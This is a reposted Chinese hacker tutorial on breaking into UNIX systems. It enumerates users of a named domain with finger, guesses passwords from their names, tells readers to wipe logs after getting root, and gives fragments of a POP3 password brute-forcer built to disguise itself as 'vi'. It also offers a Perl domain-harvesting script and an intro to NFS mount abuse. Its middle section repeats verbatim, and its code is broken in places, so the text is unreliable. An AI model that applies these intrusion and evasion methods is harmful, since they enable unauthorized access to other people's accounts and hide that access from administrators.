從UNIX系統(tǒng)獲取密碼檔(二)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:04:34 作者:佚名
我要評論

主題:
破解(Cracking)passwrd 文檔
與新手交談
困難的方法
利用mount命令獲取訪問權(quán)限
有很多方法可以獲得一個起始帳號.我將深入每個方面幫助你開始.你所需的只是一個好的帳號,用來獲得數(shù)百個帳號.想一想這:你進(jìn)入一個很好的可以利用的系統(tǒng)(
因此現(xiàn)在如果你在IRC上給某人你的login名和口令時,記住我上面說的話,不過我一直都盡量幫助人們學(xué)習(xí)啦,因此我可以說我對待碰見的朋友都是真誠老實(shí)的.
--------------------------------------------------------------------------------
困難的方法
這是另一種方法.可以確定的說,大多數(shù)的大系統(tǒng)都有用戶在使用不可靠口令.在shell環(huán)境下:
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
現(xiàn)在我們可以嘗試這樣登陸:
Login:chris Passwword 試一試:Chris,chris,myers,Myers,chrismyers,等等…
這個看起來不錯:wendt:Catherine:catherine
下面是另一個命令:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
你有更多可利用的消息了;)
我知道這讓你厭煩...
記住你的嘗試會被記錄,所以如果你成功進(jìn)入并獲得root權(quán)限的話,記得清除日志:)
以下是一個成功進(jìn)入后用得著的C小程序.
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
你也可自己寫一小perl腳本程序,能自動finger 列表中的域名并記錄響應(yīng)信息到文件中,finger完后返回并嘗試使用pop3端口,以 用戶名-用戶名(或其他信息)方式(譯注:即口令用用戶名或其他信息)登陸,記錄響應(yīng)信息到另一文件中.(這就是Emailcrk的原理)
FTP到rs.internic.net中,在域名目錄中你會找到:
com.zone.>
--------------------------------------------------------------------------------
傳輸中斷!
ov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
Down下這些文檔,在攻擊目標(biāo)域名上運(yùn)行g(shù)etdomain.pl(下面的腳本),如:
"perl getdomain.pl com.zone com >com.all"
這條指令所做的就是解開所.com的域名并放在comm.all文檔中.
如果想解開.EDU,只需:
perl getdomain.pl edu.zone edu >edu.all
現(xiàn)在你就有了名為edu.all的域名列表供你用了
下面是perl 腳本:
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "?用戶名:@HackBase.net密?碼:
\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
要使用上述腳本,你只需把上面幾行copy下來命名為getdomain.pl,拷貝到unix系統(tǒng)中,運(yùn)行: chmod x getdomain.pl
即可.
這時就可運(yùn)行上面所講的命令行了.
--------------------------------------------------------------------------------
使用Mount得到unix系統(tǒng)訪問權(quán)限
這并不難而且網(wǎng)絡(luò)上有很多系統(tǒng)是mountable(可共享的)的.Mount是一個unix命令允許你在遠(yuǎn)程機(jī)器驅(qū)動器安裝系統(tǒng).這樣一來,你既可從其他機(jī)器進(jìn)行安裝過程也可僅僅共享網(wǎng)絡(luò)中的磁盤和目錄.問題在于許多管理員過于精通unix命令和設(shè)置.或者是太懶惰而把磁盤設(shè)置為全局屬性,卻不明白全局mount(連接或共享)該磁盤,別人就能獲得對他們的用戶目錄的寫權(quán)限.
開始,你需要一個hack過的root帳號.為了能mount(連接或共享)遠(yuǎn)程磁盤并獲取權(quán)限,你要修改系統(tǒng)的password文檔并使用SU命令.
--------------------------------------------------------------------------------
困難的方法
這是另一種方法.可以確定的說,大多數(shù)的大系統(tǒng)都有用戶在使用不可靠口令.在shell環(huán)境下:
finger @domainname.com 我用真正的域名:
[10:35am][/home/ii]finger @starnet.net
[starnet.net]
Login Name Tty Idle Login Time Office Office Phone
chris Chris Myers p2 4:46 Jan 27 11:19
mike Mike Suter p1 4:57 Jan 22 16:14
mike Mike Suter p5 3d Jan 16 15:35
root System Administrator p3 4:59 Jan 16 10:17
wendt Catherine Wendt-Bern p0 3 Jan 21 14:49
[10:35am][/home/ii]
現(xiàn)在我們可以嘗試這樣登陸:
Login:chris Passwword 試一試:Chris,chris,myers,Myers,chrismyers,等等…
這個看起來不錯:wendt:Catherine:catherine
下面是另一個命令:
[10:35am][/home/ii]finger -l @starnet.net
[starnet.net]
Login: mike Name: Mike Suter
Directory: /usra/staff/mike Shell: /bin/csh
On since Wed Jan 22 16:14 (CST) on ttyp1, idle 5:26, from mikesbox.starnet.net
On since Thu Jan 16 15:35 (CST) on ttyp5, idle 3 days 22:00, from mikesbox
Last login Sun Jan 26 23:07 (CST) on ttyp2 from hurk
No Plan.
Login: root Name: System Administrator
Directory: /root Shell: /bin/csh
On since Thu Jan 16 10:17 (CST) on ttyp3, idle 5:28, from mikesbox.starnet.net
Last login Thu Jan 16 18:07 (CST) on ttyp6 from mikesbox.starnet.net
Mail forwarded to:
\chris@admin.starnet.net
#\chris@admin.starnet.net, \mike@admin.starnet.net
No Plan.
Login: wendt Name: Catherine Wendt-Bernal
Directory: /usra/staff/wendt Shell: /bin/csh
On since Tue Jan 21 14:49 (CST) on ttyp0, idle 0:02, from veggedout
No Plan.
你有更多可利用的消息了;)
我知道這讓你厭煩...
記住你的嘗試會被記錄,所以如果你成功進(jìn)入并獲得root權(quán)限的話,記得清除日志:)
以下是一個成功進(jìn)入后用得著的C小程序.
pop3hack.c
----- cut here
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sys admin's don't kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
----- cut here
你也可自己寫一小perl腳本程序,能自動finger 列表中的域名并記錄響應(yīng)信息到文件中,finger完后返回并嘗試使用pop3端口,以 用戶名-用戶名(或其他信息)方式(譯注:即口令用用戶名或其他信息)登陸,記錄響應(yīng)信息到另一文件中.(這就是Emailcrk的原理)
FTP到rs.internic.net中,在域名目錄中你會找到:
com.zone.>
--------------------------------------------------------------------------------
傳輸中斷!
ov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
Down下這些文檔,在攻擊目標(biāo)域名上運(yùn)行g(shù)etdomain.pl(下面的腳本),如:
"perl getdomain.pl com.zone com >com.all"
這條指令所做的就是解開所.com的域名并放在comm.all文檔中.
如果想解開.EDU,只需:
perl getdomain.pl edu.zone edu >edu.all
現(xiàn)在你就有了名為edu.all的域名列表供你用了
下面是perl 腳本:
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible Evil
# Questions /msg i-e or /msg i^e
#
# Retrieve command line arguments.
my($inputfile, $domain) = @ARGV;
usage() if (!defined($inputfile) || !defined($domain));
# Open and preprocess the input file.
open(INFILE, ";
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\ /))[0];
chop($key);
next if ((($key =~ tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash ;
}
# Close input file and output data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash))) {
print "?用戶名:@HackBase.net密?碼:
\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain [inputfile] [search]\n\n");
print("Where [search] is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script -----
要使用上述腳本,你只需把上面幾行copy下來命名為getdomain.pl,拷貝到unix系統(tǒng)中,運(yùn)行: chmod x getdomain.pl
即可.
這時就可運(yùn)行上面所講的命令行了.
--------------------------------------------------------------------------------
使用Mount得到unix系統(tǒng)訪問權(quán)限
這并不難而且網(wǎng)絡(luò)上有很多系統(tǒng)是mountable(可共享的)的.Mount是一個unix命令允許你在遠(yuǎn)程機(jī)器驅(qū)動器安裝系統(tǒng).這樣一來,你既可從其他機(jī)器進(jìn)行安裝過程也可僅僅共享網(wǎng)絡(luò)中的磁盤和目錄.問題在于許多管理員過于精通unix命令和設(shè)置.或者是太懶惰而把磁盤設(shè)置為全局屬性,卻不明白全局mount(連接或共享)該磁盤,別人就能獲得對他們的用戶目錄的寫權(quán)限.
開始,你需要一個hack過的root帳號.為了能mount(連接或共享)遠(yuǎn)程磁盤并獲取權(quán)限,你要修改系統(tǒng)的password文檔并使用SU命令.
相關(guān)文章
- “CMOS密碼”就是通常所說的“開機(jī)密碼”,主要是為了防止別人使用自已的計(jì)算機(jī),設(shè)置的一個屏障2023-08-01
QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調(diào)用QQ的OCR的,但翻譯按鈕確實(shí)沒啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04- QQ截圖是我用過的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨(dú)立版目前除了屏幕錄制功能其他都逆出來了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導(dǎo)致軟件無法安裝的解決方法
很多電腦用戶在考慮自己電腦磁盤分區(qū)安全時會采用 Windows 自帶的 BitLocker 加密工具對電腦磁盤分區(qū)進(jìn)行加密。但有些人加密后就會忘記自己設(shè)置的密碼從而導(dǎo)致在安裝其它軟2020-11-25防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細(xì)介紹了如何才能防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-06-27徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機(jī)密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價值,2017-06-27量子計(jì)算機(jī)輕松破解加密算法 如何破解加密算法?
最近有電腦用戶反應(yīng)量子計(jì)算機(jī)可以破解下載的所有的加密算法嗎?其實(shí)也不是不可以,下面虛擬就為大家講解買臺量子計(jì)算機(jī),如何分分鐘破解加密算法2016-09-26怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,一種網(wǎng)頁后門。黑客通常會通過它控制別人網(wǎng)絡(luò)服務(wù)器,那么怎么破解webshell密碼呢?一起來看看吧2016-09-19- 本文討論了針對Linux系統(tǒng)全盤加密的冷啟動攻擊,大家都認(rèn)為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28
防止泄露公司機(jī)密、企業(yè)數(shù)據(jù)防泄密軟件排名、電腦文件加密軟件排行
面對日漸嚴(yán)重的內(nèi)部泄密事件,我們?nèi)绾问刈o(hù)企業(yè)的核心信息,如何防止內(nèi)部泄密也就成了擺在各個企業(yè)領(lǐng)導(dǎo)面前的一大問題。其實(shí),針對內(nèi)網(wǎng)安全,防止內(nèi)部信息泄漏早已有了比較2015-12-17